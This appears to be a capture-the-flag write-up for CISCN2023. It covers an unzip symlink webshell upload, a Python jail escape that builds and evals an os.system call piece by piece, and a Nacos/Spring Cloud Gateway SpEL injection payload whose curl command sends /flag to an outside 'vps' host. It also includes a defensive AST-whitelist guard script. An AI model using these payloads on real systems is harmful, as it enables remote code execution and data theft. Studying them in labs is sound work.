CISCN2023
2023-05-28 23:41:08

unzip

Symbolic link: include the webshell through var/www/html.

Then drop the webshell in via the var directory.

Upload the two archives in that order.

Read the flag.

flag{7349cbbd-20da-4b3e-8bd9-36084dac7053}

pyshell

A Python shell.

Import the os module to read the flag.

But that is banned.

open and eval are still available.

Still banned.
My guess is that there is a limit on input length.

```text
Welcome to this python shell,try to find the flag!
>>'__imp'
'__imp'
>>_+'ort'
'__import'
>>_+'__('
'__import__('
>>_+"'os"
"__import__('os"
>>v
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'v' is not defined
>>_+"')."
"__import__('os')."
>>_+"sys"
"__import__('os').sys"
>>_+"tem"
"__import__('os').system"
>>_+"('c"
"__import__('os').system('c"
>>_+"at "
"__import__('os').system('cat "
>>_+"/fl"
"__import__('os').system('cat /fl"
>>_+"ag'"
"__import__('os').system('cat /flag'"
>>_+")"
"__import__('os').system('cat /flag')"
>>eval(_)
flag{5dd8032d-4dbf-40c2-9ef9-c86386511c7a}0
```


flag{5dd8032d-4dbf-40c2-9ef9-c86386511c7a}
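From the defending side, as an added example that is not code from the challenge or the write-up: the transcript above shows why a per-line length limit on a REPL is no defence, because the dangerous string is assembled from short harmless pieces through `_` and only the final `eval(_)` does anything. The script replays the write-up's exact lines through two guards, a length-only check modelled on the jail and an AST whitelist that refuses calls, attribute access and dunder names; the limit of 7 is an assumption drawn from the transcript (every accepted line has at most seven characters), and `length_only`, `ast_check`, `first_rejected` and `replay` are names chosen here.

```python
import ast

# Assumed limit: every line the jail accepted in the write-up is <= 7 chars.
LIMIT = 7

# Node types that merely build or combine values. Call, Attribute, Subscript,
# Lambda, comprehensions and f-strings are deliberately absent from the list.
SAFE_NODES = (
    ast.Expression, ast.Constant, ast.Name, ast.Load,
    ast.BinOp, ast.UnaryOp, ast.BoolOp, ast.Compare,
    ast.Tuple, ast.List, ast.Dict, ast.Set,
    ast.operator, ast.unaryop, ast.boolop, ast.cmpop,
)

def length_only(line):
    """Guard modelled on the jail: accept any line that is short enough."""
    return len(line) <= LIMIT

def ast_check(line):
    """Parse the line as a single expression and refuse any construct that
    can call, import or reach attributes, no matter how short the text is."""
    try:
        tree = ast.parse(line, mode="eval")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, SAFE_NODES):
            return False
        if isinstance(node, ast.Name) and node.id.startswith("__"):
            return False
    return True

# The lines typed in the write-up, in order (the mistyped 'v' is skipped).
CHUNKS = [
    "'__imp'", "_+'ort'", "_+'__('", "_+\"'os\"", "_+\"').\"", "_+\"sys\"",
    "_+\"tem\"", "_+\"('c\"", "_+\"at \"", "_+\"/fl\"", "_+\"ag'\"", "_+\")\"",
    "eval(_)",
]

def first_rejected(check, chunks=CHUNKS):
    """Return the first line `check` refuses, or None if every line passes."""
    return next((line for line in chunks if not check(line)), None)

def replay(check, chunks=CHUNKS):
    """Feed the chunks to a REPL guarded by `check`. Accepted lines are
    evaluated with builtins removed and `_` bound to the previous result, as
    the real REPL binds it. Returns (last_value, first_rejected_line)."""
    last = None
    for line in chunks:
        if not check(line):
            return last, line
        last = eval(compile(line, "<line>", "eval"), {"__builtins__": {}}, {"_": last})
    return last, None
```

With `length_only` no line is ever refused; with `ast_check` the string `__import__('os').system('cat /flag')` is still assembled, harmlessly, and the guard stops exactly at `eval(_)`, the one step that would execute it.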

BackendService

A login form.

Brute-forcing got nowhere.

Looking up default passwords did not work either.

Unauthenticated bypass.

aa/aa

Log in.

Create a new configuration.

The challenge's external IP and the internal port.

The listener catches a connection from the internal host.

Following the article

Nacos结合Spring Cloud Gateway RCE利用 - 先知社区 (aliyun.com)

write the PoC:

```json
{
  "spring": {
    "cloud": {
      "gateway": {
        "routes": [
          {
            "id": "exam",
            "order": 0,
            "uri": "lb://service-provider",
            "predicates": [
              "Path=/echo/**"
            ],
            "filters": [
              {
                "name": "AddResponseHeader",
                "args": {
                  "name": "result",
                  "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'curl','vps:5678','-d','@/flag'}).getInputStream())).replaceAll('\\n','').replaceAll('\\r','')}"
                }
              }
            ]
          }
        ]
      }
    }
  }
}
```


flag{e1667a09-38d6-4eb8-b38d-20de0f9269a4}
